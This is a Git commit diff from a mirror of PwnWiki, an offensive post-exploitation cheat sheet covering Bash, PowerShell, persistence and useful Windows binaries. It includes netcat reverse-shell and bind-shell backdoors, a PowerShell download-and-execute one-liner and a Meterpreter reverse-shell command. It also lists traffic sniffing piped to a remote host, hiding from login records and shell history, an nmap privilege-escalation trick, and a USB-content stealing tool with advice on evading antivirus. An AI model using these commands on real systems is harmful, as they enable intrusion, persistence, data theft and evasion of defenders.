weyne/pwnwiki.github.io
1
0
Fork 0
mirror of https://github.com/oXis/pwnwiki.github.io.git synced 2025-10-29 16:56:59 +00:00
Code Issues Packages Projects Releases Wiki Activity

Fixing merge issues

Browse Source
This commit is contained in:
webbreacher 2014-02-06 20:21:55 -05:00
commit ab073a6bb6
11 changed files with 511 additions and 33 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
bins/windows.md Normal file
View File

@ -0,0 +1,7 @@
# Useful Windows Binaries
Useful Windows binary tools that can be used for post exploitation.
| Tool | Description / Importance | Contributer |
| ----------- | ------------------------ | ----------- |
| usbdump.exe | Once executed, usbdump will run in the background and will dump the contents of all connected usb devices to a randomly numbered folder within the same directory as the usbdump.exe program. Useful for grabbing the contents of any usb devices later connected to a compromized machine. May have to modify it to bypass AV as its signature is in quite a few AV's. | Ian |

7
bins/windows/index.md Normal file
View File

@ -0,0 +1,7 @@
# Useful Windows Binaries
Useful Windows binary tools that can be used for post exploitation.
| Tool | Description / Importance | Contributer |
| ----------- | ------------------------ | ----------- |
| usbdump.exe | Once executed, usbdump will run in the background and will dump the contents of all connected usb devices to a randomly numbered folder within the same directory as the usbdump.exe program. Useful for grabbing the contents of any usb devices later connected to a compromized machine. May have to modify it to bypass AV as its signature is in quite a few AV's. | Ian |

5
index.md
View File

@ -8,7 +8,7 @@
### Live Online Copy: ### Live Online Copy:
You can find a copy of the project online at: http://PwnWiki.io You can find a copy of the project online at: http://pwnwiki.io
### Offline Use: ### Offline Use:
@ -32,8 +32,7 @@ Curators:
* [@tekwizz123](https://twitter.com/tekwizz123) [gimmick:TwitterFollow](@tekwizz123) * [@tekwizz123](https://twitter.com/tekwizz123) [gimmick:TwitterFollow](@tekwizz123)
* [@jakx_](https://twitter.com/jakx_) [gimmick:TwitterFollow](@jakx_) * [@jakx_](https://twitter.com/jakx_) [gimmick:TwitterFollow](@jakx_)
* [@TheColonial](https://twitter.com/TheColonial) [gimmick:TwitterFollow](@TheColonial) * [@TheColonial](https://twitter.com/TheColonial) [gimmick:TwitterFollow](@TheColonial)
* [@Wireghoul](https://twitter.com/Wireghoul) [gimmick:TwitterFollow](@Wireghoul) * [@Wireghoul](https://twitter.com/Wireghoul) [gimmick:TwitterFollow](@Wireghoul)
If you would like to become a curator, please contact [mubix@hak5.org](mailto:mubix@hak5.org) If you would like to become a curator, please contact [mubix@hak5.org](mailto:mubix@hak5.org)

40
index.md~ Normal file
View File

@ -0,0 +1,40 @@
![](images/logo.jpg)
[Image Generated Here](http://www.addletters.com/pictures/restaurant-sign-generator/4772466.htm#.UplRZ42PuuY)
### PwnWiki.io is a collection TTPs (tools, tactics, and procedures) for what to do after access has been gained.
- - - - - -
### Live Online Copy:
You can find a copy of the project online at: http://pwnwiki.io
### Offline Use:
1. Clone the repository or pull the archive ([download zip](https://github.com/pwnwiki/pwnwiki.github.io/archive/master.zip)) of the repo
2. Open index.html
3. Most modern browsers don't allow the access of local files from a locally loaded HTML file. On Windows you can use [Mongoose Tiny](http://cesanta.com/downloads.html) or [HFS](http://www.rejetto.com/hfs/) to host the files locally. On OSX and Linux `python -m SimpleHTTPServer` seems to work just fine.
#### Referenced tools can be found here: https://github.com/mubix/post-exploitation (If they aren't built into the OS)
- - - - - -
#### Submitting Content
We want/need your help! Please contribute to this project is via GitHub (https://github.com/pwnwiki/pwnwiki.github.io). That allows us to get your project-ready content incorporated into the wiki fast.
We realize that not everyone can/wants to submit content via GitHub and that's cool. If your go-to content is not up here and you don't want to spend the time becoming a Git Jedi, just visit our [Google Form](https://docs.google.com/forms/d/1N7-jRjnUXoz-UwB2h0du2IrskFJW6hBGs4YsTwvEncE/viewform). Due to the large amount of submissions and content, there may be a delay between your posting and us getting your content into the project. Thanks for your submissions and your patience!
- - - - - -
Curators:
* [@mubix](https://twitter.com/mubix)
* [@WebBreacher](https://twitter.com/webbreacher)
* [@tekwizz123](https://twitter.com/tekwizz123)
* [@jakx_](https://twitter.com/jakx_)
* [@TheColonial](https://twitter.com/TheColonial)
* [@Wireghoul](https://twitter.com/Wireghoul)
If you would like to become a curator, please contact [mubix@hak5.org](mailto:mubix@hak5.org)
[gimmick:ForkMeOnGitHub ({ color: 'red', position: 'right' })](http://www.github.com/pwnwiki/pwnwiki.github.io/)

21
persistence/linux/general.md Normal file
View File

@ -0,0 +1,21 @@
<!-- Code for collapse and expand -->
<script type="text/javascript">
$(document).ready(function() {
$('div.view').hide();
$('div.slide').click(function() {
$(this).next('div.view').slideToggle('fast');
return false;
});
});
</script>
# Linux General Persistence Commands
Commands to run to maintain persistence after you have exploited it and are usually executed from the context of the bash prompt.
###Run command as a daemon
*Note this doesn't work with anything from apache. Runs like & but doesn't care if the parent process closes*
```bash
setsid *command*
```

21
persistence/linux/general.md~ Normal file
View File

@ -0,0 +1,21 @@
<!-- Code for collapse and expand -->
<script type="text/javascript">
$(document).ready(function() {
$('div.view').hide();
$('div.slide').click(function() {
$(this).next('div.view').slideToggle('fast');
return false;
});
});
</script>
# Linux General Persistence Commands
Commands to run to maintain persistence after you have exploited it and are usually executed from the context of the bash prompt.
###Run command as a daemon
*Note this doesn't work with anything from apache*
```bash
setsid *command*
```

5
persistence/linux/index.md Normal file
View File

@ -0,0 +1,5 @@
# Linux Persistence Commands
Commands that help you maintain control over a compromised system.
* [General Commands](general.md) - Commands your could/should use to maintain your hold on the compromised system.

23
scripting/bash.md
View File

@ -89,12 +89,31 @@ grep -E -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
tcpdump -w - | nc -v 8.8.8.8 9999 tcpdump -w - | nc -v 8.8.8.8 9999
``` ```
**Recursively search for files within a directory** **Recursively search for text contained in files within a directory**
```bash ```bash
zcat -rf ./* | grep "searchstring" zcat -rf ./* | grep "searchstring"
``` ```
**Recursively search for files with the specified word within them**
*Submitted by cat on Google Fourms*
```bash
ls -a | find | grep -i "string"
```
**Netcat backdoor**
*Does not work with most distro's default version of netcat (most do not define ENABLE_GAPING_SECURITY_HOLE which turns on -e)*
```bash
nc -e /bin/bash *remotecomputer* *port*
OR
nc -e /bin/bash -lp *port*
```
**View CPU Information**
```bash
cat /proc/cpuinfo
```
Credits Credits
----------- -----------
Credits to @TheAndrewBalls for posting some awsome one liners (the hidden SSH example and the DNS enumeration are both his contributions Credits to @TheAndrewBalls for posting some awsome one liners (the hidden SSH example and the DNS enumeration are both his contributions)

113
scripting/bash.md~ Normal file
View File

@ -0,0 +1,113 @@
# Bash Commands for Post Exploitation
One liners
-----------
**Resolve a list of hostnames to IP addresses**
```bash
awk < hostnames.txt '{ system("resolveip -s " $1) }'
```
**IIS 6.0 IP Disclosure**
```bash
curl -l -O -H "Host:" "example.com"
```
**Connect to SSL websites**
```bash
openssl s_client -connect example.com:443
```
**Convert base64 to text**
```bash
echo 'base64string' | base64 -d (Use -D on OSX)
```
**Decode ASCII shellcode**
```bash
echo -e *shellcode hex string* (may need to use -i to ignore bad chars)
```
**Enumerate DNS of Class C**
```bash
for ip in $(seq 1 254); do; host 10.1.1.$ip | grep "name pointer"; done
```
**SSH to box and hide from "who" and "lastlog"**
```bash
ssh andrew@10.1.1.1 -T /bin/bash
```
**Prevent terminal logging**
```bash
unset HISTFILE
```
**Add immutable attribute to a unix file**
```bash
chattr +i *file*
```
**SSH into host2 through host1**
```bash
ssh -o "proxycommand ssh -W host2 host1" host2
```
**Nmap setuid privesc**
```bash
nmap --script <(echo 'os.execute("/bin/sh")')
nmap --interactive (for older versions)
```
**Transfer files through SSH**
```bash
ssh test@10.1.1.1 "cat test.tar.gz" > test.tar.gz
```
**Internal port redirect for bypassing services**
```bash
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 4444
```
**Enable forwarding on the fly**
```bash
sysctl -w net.ipv4.ip_forward=1
```
**Kill with USR1 developer defined signal**
```bash
kill -USR1 <pid>
```
**Pull IP addresses from a file**
```bash
grep -E -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
```
**Sniff traffic with tcpdump and send to remote tcp socket**
```bash
tcpdump -w - | nc -v 8.8.8.8 9999
```
**Recursively search for text contained in files within a directory**
```bash
zcat -rf ./* | grep "searchstring"
```
**Recursively search for files with the specified word within them**
*Submitted by cat on Google Fourms*
```bash
ls -a | find | grep -i "string"
```
**Netcat backdoor**
```bash
nc -e /bin/bash *remotecomputer* *port*
OR
nc -e /bin/bash -lp *port*
```
Credits
-----------
Credits to @TheAndrewBalls for posting some awsome one liners (the hidden SSH example and the DNS enumeration are both his contributions)

181
scripting/powershell.md
View File

@ -65,49 +65,174 @@ Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.10
* **Output**: * **Output**:
* <div class="slide" style="cursor: pointer;"> **Windows 7:** Show/Hide</div><div class="view"><code>PS C:\Users\johndoe> ((New-Object System.Security.Principal.SecurityIdentifier("S-1-5-21-1319606305-3131390644-2280705280-<br>1000")).translate([System.Security.Principal.NTAccount])).value<br>WIN-244VDGE5OGH\johndoe</code></div> * <div class="slide" style="cursor: pointer;"> **Windows 7:** Show/Hide</div><div class="view"><code>PS C:\Users\johndoe> ((New-Object System.Security.Principal.SecurityIdentifier("S-1-5-21-1319606305-3131390644-2280705280-<br>1000")).translate([System.Security.Principal.NTAccount])).value<br>WIN-244VDGE5OGH\johndoe</code></div>
## Using the PowerShell Active Directory Modules ## Using the PowerShell Active Directory Modules
### Via https://www.trustedsec.com/uncategorized/powershell-reconnaissance/ ### Via https://www.trustedsec.com/uncategorized/powershell-reconnaissance/
### Setting Credentials ### Setting Credentials
* **Command with arguments**: `$cred = Get-Credential` * **Command with arguments**: `$cred = Get-Credential`
* **Description**: Stores valid credentials in the $cred variable for use with the Active Directory Modules. * **Description**: Stores valid credentials in the $cred variable for use with the Active Directory Modules.
* **Notes**: These following commands require the Powershell Active Directory Modules to be installed. Steps to install for Win7 are detailed [here] (http://blogs.msdn.com/b/rkramesh/archive/2012/01/17/how-to-add-active-directory-module-in-powershell-in-windows-7.aspx) * **Notes**: These following commands require the Powershell Active Directory Modules to be installed. Steps to install for Win7 are detailed [here] (http://blogs.msdn.com/b/rkramesh/archive/2012/01/17/how-to-add-active-directory-module-in-powershell-in-windows-7.aspx)
### Query to List "Domain Admins" ### Query to List "Domain Admins"
* **Command with arguments**: `Get-ADGroupMember -Credential $cred -server pwnt.com "Domain Admins"` * **Command with arguments**: `Get-ADGroupMember -Credential $cred -server pwnt.com "Domain Admins"`
* **Output**: * **Output**:
* <div class="slide" style="cursor: pointer;"> **Windows 7:** Show/Hide</div><div class="view"><code>distinguishedName : CN=Administrator,CN=Users,DC=pwnt,DC=com<br>name : Administrator<br>objectClass : user<br>objectGUID : 1fd60ff8-07a4-4c6e-9a1e-7cd0d7bb97db<br>SamAccountName : Administrator<br>SID : S-1-5-21-2027135834-1792351174-2509185371-500</code></div> * <div class="slide" style="cursor: pointer;"> **Windows 7:** Show/Hide</div><div class="view"><code>distinguishedName : CN=Administrator,CN=Users,DC=pwnt,DC=com<br>name : Administrator<br>objectClass : user<br>objectGUID : 1fd60ff8-07a4-4c6e-9a1e-7cd0d7bb97db<br>SamAccountName : Administrator<br>SID : S-1-5-21-2027135834-1792351174-2509185371-500</code></div>
### Enumerate All Servers on Domain ### Enumerate All Servers on Domain
* **Command with arguments**: `Get-ADComputer -Credential $cred -server pwnt.com -LDAPFilter "(&(objectCategory=computer)(opera * **Command with arguments**: `Get-ADComputer -Credential $cred -server pwnt.com -LDAPFilter "(&(objectCategory=computer)(opera
tingSystem=*Server*))" |select name` tingSystem=*Server*))" |select name`
* **Output**: * **Output**:
* <div class="slide" style="cursor: pointer;"> **Windows 7:** Show/Hide</div><div class="view"><code>name<br>----<br>PWNT-DC<br> * <div class="slide" style="cursor: pointer;"> **Windows 7:** Show/Hide</div><div class="view"><code>name<br>----<br>PWNT-DC<br>
Exchange1<br> Exchange1<br>SharePoint1</code></div>
SharePoint1</code></div>
# Powershell CLI short hand: # Powershell CLI short hand:
## PowerShell.exe
Parameter Shortcut(s)
* Command `c`
* EncodedArguments `ea`, `encodeda`
* EncodedCommand `e`,`ec`
* ExecutionPolicy `ex`,`ep`
* File `f`
* Help `-h`,`-?` or `/h`,`/?`
* InputFormat `i`,`if`
* NoExit `noe`
* NoLogo `nol`
* NoProfile `nop`
* NonInteractive `noni`
* OutputFormat `o`,`of`
* Sta `s`
* WindowStyle `w`
### PowerShell.exe ## powershell_ise.exe
Parameter - Shortcut(s) Parameter - Shortcut(s)
* Command - `c` * File - `f`
* EncodedArguments - `ea`, `encodeda` * Help - `-h`,`-?` or `/h`,`/?`
* EncodedCommand - `e`,`ec` * Mta - `m`
* ExecutionPolicy - `ex`,`ep` * NoProfile - `n`
* File - `f`
* Help - `-h`,`-?` or `/h`,`/?`
* InputFormat - `i`,`if`
* NoExit - `noe`
* NoLogo - `nol`
* NoProfile - `nop`
* NonInteractive - `noni`
* OutputFormat - `o`,`of`
* Sta - `s`
* WindowStyle - `w`
### powershell_ise.exe
Parameter - Shortcut(s) ## Get Info About All Connected Drives
* File - `f` * **Command with arguments**: `[System.IO.DriveInfo]::GetDrives()`
* Help - `-h`,`-?` or `/h`,`/?` * **Output**:
* Mta - `m` * <div class="slide" style="cursor: pointer;"> **Windows 7:** Show/Hide</div><div class="view"><code>
* NoProfile - `n` Name : C:\
DriveType : Fixed
DriveFormat : NTFS
IsReady : True
AvailableFreeSpace : 111111111111
TotalFreeSpace : 111111111111
TotalSize : 111111111111
RootDirectory : C:\
VolumeLabel : HP
<br />
Name : D:\
DriveType : Fixed
DriveFormat : NTFS
IsReady : True
AvailableFreeSpace : 111111111111
TotalFreeSpace : 111111111111
TotalSize : 111111111111
RootDirectory : D:\
VolumeLabel : DATA
<br />
Name : E:\
DriveType : CDRom
DriveFormat :
IsReady : False
AvailableFreeSpace :
TotalFreeSpace :
TotalSize :
RootDirectory : E:\
VolumeLabel :
</code></div>
## Obtain detailed information about a running process or service
* **Command with arguments**: `gps | ?{$_.name -match "<process/service name>"} | ?{$_.id -match "<process/service id>"} | select *`
* **Output**:
* <div class="slide" style="cursor: pointer;"> **Windows 7:** Show/Hide</div><div class="view"><code>
__NounName : Process
Name : firefox
Handles : 383
VM : 272830464
WS : 90185728
PM : 69402624
NPM : 24676
Path : C:\Program Files\Mozilla Firefox\firefox.exe
Company : Mozilla Corporation
CPU : 2.1684139
FileVersion : 26.0
ProductVersion : 26.0
Description : Firefox
Product : Firefox
Id : 3176
PriorityClass : Normal
HandleCount : 383
WorkingSet : 90185728
PagedMemorySize : 69402624
PrivateMemorySize : 69402624
VirtualMemorySize : 272830464
TotalProcessorTime : 00:00:02.1684139
BasePriority : 8
ExitCode :
HasExited : False
ExitTime :
Handle : 1904
MachineName : .
MainWindowHandle : 131426
MainWindowTitle : Mozilla Firefox Start Page - Mozilla Firefox
MainModule : System.Diagnostics.ProcessModule (firefox.exe)
MaxWorkingSet : 1413120
MinWorkingSet : 204800
Modules : {System.Diagnostics.ProcessModule (firefox.exe), System.Diagnostics.ProcessModule (ntdll.d
ll), System.Diagnostics.ProcessModule (kernel32.dll), System.Diagnostics.ProcessModule (KE
RNELBASE.dll)...}
NonpagedSystemMemorySize : 24676
NonpagedSystemMemorySize64 : 24676
PagedMemorySize64 : 69402624
PagedSystemMemorySize : 277804
PagedSystemMemorySize64 : 277804
PeakPagedMemorySize : 77041664
PeakPagedMemorySize64 : 77041664
PeakWorkingSet : 97169408
PeakWorkingSet64 : 97169408
PeakVirtualMemorySize : 281219072
PeakVirtualMemorySize64 : 281219072
PriorityBoostEnabled : True
PrivateMemorySize64 : 69402624
PrivilegedProcessorTime : 00:00:00.4992032
ProcessName : firefox
ProcessorAffinity : 1
Responding : True
SessionId : 1
StartInfo : System.Diagnostics.ProcessStartInfo
StartTime : 1/29/2014 8:02:12 PM
SynchronizingObject :
Threads : {2664, 772, 3160, 544...}
UserProcessorTime : 00:00:01.6692107
VirtualMemorySize64 : 272830464
EnableRaisingEvents : False
StandardInput :
StandardOutput :
StandardError :
WorkingSet64 : 90185728
Site :
Container :
</code></div>
### Translate SID to username
* **Command with arguments**: `((New-Object System.Security.Principal.SecurityIdentifier("<ssid>")).translate([System.Security.Principal.NTAccount])).value`
* **Output**:
* <div class="slide" style="cursor: pointer;"> **Windows 7:** Show/Hide</div><div class="view"><code>
NT AUTHORITY\SELF
</code></div>
### Grab each user on the local system and list their last login time, their SSID and their user path.
* **Command with arguments**: `gwmi win32_userprofile | select -unique @{name="Name";expression={$_.__server}},@{name="SID";expression={$_.sid}},@{name="LastUseTime";expression={$_.converttodatetime($_.lastusetime)}},localpath | ft -auto`
* **Output**:
* <div class="slide" style="cursor: pointer;"> **Windows 7:** Show/Hide</div><div class="view"><code>
WIN-C77DTCDJS11 S-1-5-xx-xxxxxxxxxx-xxxxxxxxxx-xxxxxxxxxx-xxxx x/xx/2014 x:xx:xx PM C:\Users\xxxx
WIN-C77DTCDJS11 S-1-5-20 C:\Windows\ServiceProfiles\Netwo...
WIN-C77DTCDJS11 S-1-5-19 C:\Windows\ServiceProfiles\Local...
WIN-C77DTCDJS11 S-1-5-18 C:\Windows\system32\config\syste...
</code></div>

121
scripting/powershell.md~ Normal file
View File

@ -0,0 +1,121 @@
<!-- Code for collapse and expand -->
<script type="text/javascript">
$(document).ready(function() {
$('div.view').hide();
$('div.slide').click(function() {
$(this).next('div.view').slideToggle('fast');
return false;
});
});
</script>
# Windows Powershell Commands and Scripts for Post Exploitation
# One liners
**Download and Execute Remote Powershell Script**
```
iex (New-Object Net.WebClient).DownloadString("http://host/file.txt")
```
**Download and Save File**
```
(new-object System.Net.WebClient).Downloadfile('http://host/file.exe', 'file.exe')
```
**Enumerate Allowed Outbound Ports 1-1024 via [securitypadawan.blogspot.com](http://securitypadawan.blogspot.com/2013/04/quickly-determine-allowed-outbound-ports.html)**
```
$ErrorActionPreference = "silentlycontinue"; 1..1024 | % {$req = [System.Net.WebRequest]::Create("http://letmeoutofyour.net:$_"); $req.Timeout = 600; $resp = $req.GetResponse(); $respstream = $resp.GetResponseStream();
$stream = new-object System.IO.StreamReader $respstream; $out = $stream.ReadToEnd(); if ($out.trim() -eq "w00tw00t"){echo "$_ Allowed out"}}
```
**Reverse Shell Using [PowerSploit's Invoke-Shellcode](https://github.com/mattifestation/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1)**
```
Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.10 -Lport 443 -Force
```
----
# Commands with Sample Output
## Hardware
### Get BIOS Information
* **Command with arguments**: `gwmi win32_bios`
* **Description**: Retrieves BIOS information including system serial number.
* **Output**:
* <div class="slide" style="cursor: pointer;"> **Windows 7:** Show/Hide</div><div class="view"><code>PS C:\Users\johndoe> gwmi win32_bios<br>SMBIOSBIOSVersion : 6.00<br>Manufacturer : Phoenix Technologies LTD<br>Name : PhoenixBIOS 4.0 Release 6.0<br>SerialNumber : VMware-56 4d 9b 0f 26 ba 8c f9-6e 7a 1e 33 5d 3c f0 dc<br>Version : INTEL - 6040000</code></div>
### Get Drive Information
* **Command with arguments**: `[System.IO.DriveInfo]::GetDrives()`
* **Output**:
* <div class="slide" style="cursor: pointer;"> **Windows 7:** Show/Hide</div><div class="view"><code>PS C:\Users\johndoe> [System.IO.DriveInfo]::GetDrives()<br><br>Name : C:\<br>DriveType : Fixed<br>DriveFormat : NTFS<br>IsReady : True<br>AvailableFreeSpace : 55568087552<br>TotalFreeSpace : 55568087552<br>TotalSize : 159876850304<br>RootDirectory : C:\<br>VolumeLabel : <br><br>Name : D:\<br>DriveType : CDRom<br>DriveFormat : <br>IsReady : False<br>AvailableFreeSpace : <br>TotalFreeSpace : <br>TotalSize : <br>RootDirectory : D:\<br>VolumeLabel : <br><br>Name : G:\<br>DriveType : Removable<br>DriveFormat : <br>IsReady : False<br>AvailableFreeSpace : <br>TotalFreeSpace : <br>TotalSize : <br>RootDirectory : G:\<br>VolumeLabel : <br><br>Name : V:\<br>DriveType : Network<br>DriveFormat : NTFS<br>IsReady : True<br>AvailableFreeSpace : 259182640616<br>TotalFreeSpace : 259182640616<br>TotalSize : 827361812256<br>RootDirectory : V:\<br>VolumeLabel : TestMappedDrive</code></div>
## User Information
### Display Username, SID, Last Used
* **Command with arguments**: `gwmi win32_userprofile | select -unique @{name="Name";expression={$_.__server}},@{name="SID";expression={$_.sid}},@{name="LastUseTime";expression={$_.converttodatetime($_.lastusetime)}},localpath | ft -auto`
* **Description**: Retrieves information about system users.
* **Output**:
* <div class="slide" style="cursor: pointer;"> **Windows 7:** Show/Hide</div><div class="view"><code>PS C:\Users\johndoe> gwmi win32\_userprofile | select -unique @{name="Name";expression={$\_.\_\_server}},@{name="SID";expressi<br>on={$\_.sid}},@{name="LastUseTime";expression={$\_.converttodatetime($\_.lastusetime)}},localpath | ft -auto<br><br>Name&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;SID&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;LastUseTime&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;localpath<br>----&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;---&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-----------&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;---------<br>WIN-244VDGE5OGH&nbsp;S-1-5-21-1319606305-3131390644-2280705280-1000&nbsp;4/13/2012&nbsp;7:52:02&nbsp;PM&nbsp;C:\Users\johndoe<br>WIN-244VDGE5OGH&nbsp;S-1-5-20&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:\Windows\ServiceProfiles\Netwo...<br>WIN-244VDGE5OGH&nbsp;S-1-5-19&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:\Windows\ServiceProfiles\Local...<br>WIN-244VDGE5OGH&nbsp;S-1-5-18&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:\Windows\system32\config\syste...</code></div>
### Translate SID to Username
* **Command with arguments**: `((New-Object System.Security.Principal.SecurityIdentifier("S-1-5-19")).translate([System.Security.Principal.NTAccount])).value`
* **Output**:
* <div class="slide" style="cursor: pointer;"> **Windows 7:** Show/Hide</div><div class="view"><code>PS C:\Users\johndoe> ((New-Object System.Security.Principal.SecurityIdentifier("S-1-5-21-1319606305-3131390644-2280705280-<br>1000")).translate([System.Security.Principal.NTAccount])).value<br>WIN-244VDGE5OGH\johndoe</code></div>
## Using the PowerShell Active Directory Modules
### Via https://www.trustedsec.com/uncategorized/powershell-reconnaissance/
### Setting Credentials
* **Command with arguments**: `$cred = Get-Credential`
* **Description**: Stores valid credentials in the $cred variable for use with the Active Directory Modules.
* **Notes**: These following commands require the Powershell Active Directory Modules to be installed. Steps to install for Win7 are detailed [here] (http://blogs.msdn.com/b/rkramesh/archive/2012/01/17/how-to-add-active-directory-module-in-powershell-in-windows-7.aspx)
### Query to List "Domain Admins"
* **Command with arguments**: `Get-ADGroupMember -Credential $cred -server pwnt.com "Domain Admins"`
* **Output**:
* <div class="slide" style="cursor: pointer;"> **Windows 7:** Show/Hide</div><div class="view"><code>distinguishedName : CN=Administrator,CN=Users,DC=pwnt,DC=com<br>name : Administrator<br>objectClass : user<br>objectGUID : 1fd60ff8-07a4-4c6e-9a1e-7cd0d7bb97db<br>SamAccountName : Administrator<br>SID : S-1-5-21-2027135834-1792351174-2509185371-500</code></div>
### Enumerate All Servers on Domain
* **Command with arguments**: `Get-ADComputer -Credential $cred -server pwnt.com -LDAPFilter "(&(objectCategory=computer)(opera
tingSystem=*Server*))" |select name`
* **Output**:
* <div class="slide" style="cursor: pointer;"> **Windows 7:** Show/Hide</div><div class="view"><code>name<br>----<br>PWNT-DC<br>
Exchange1<br>
SharePoint1</code></div>
### Get Info About All Connected Drives
* **Command with arguments**: `[System.IO.DriveInfo]::GetDrives()`
* **Output**:
* <div class="slide" style="cursor: pointer;"> **Windows 7:** Show/Hide</div><div class="view"><code>
Name : C:\
DriveType : Fixed
DriveFormat : NTFS
IsReady : True
AvailableFreeSpace : 111111111111
TotalFreeSpace : 111111111111
TotalSize : 111111111111
RootDirectory : C:\
VolumeLabel : HP
<br />
Name : D:\
DriveType : Fixed
DriveFormat : NTFS
IsReady : True
AvailableFreeSpace : 111111111111
TotalFreeSpace : 111111111111
TotalSize : 111111111111
RootDirectory : D:\
VolumeLabel : DATA
<br />
Name : E:\
DriveType : CDRom
DriveFormat :
IsReady : False
AvailableFreeSpace :
TotalFreeSpace :
TotalSize :
RootDirectory : E:\
VolumeLabel :
</code></div>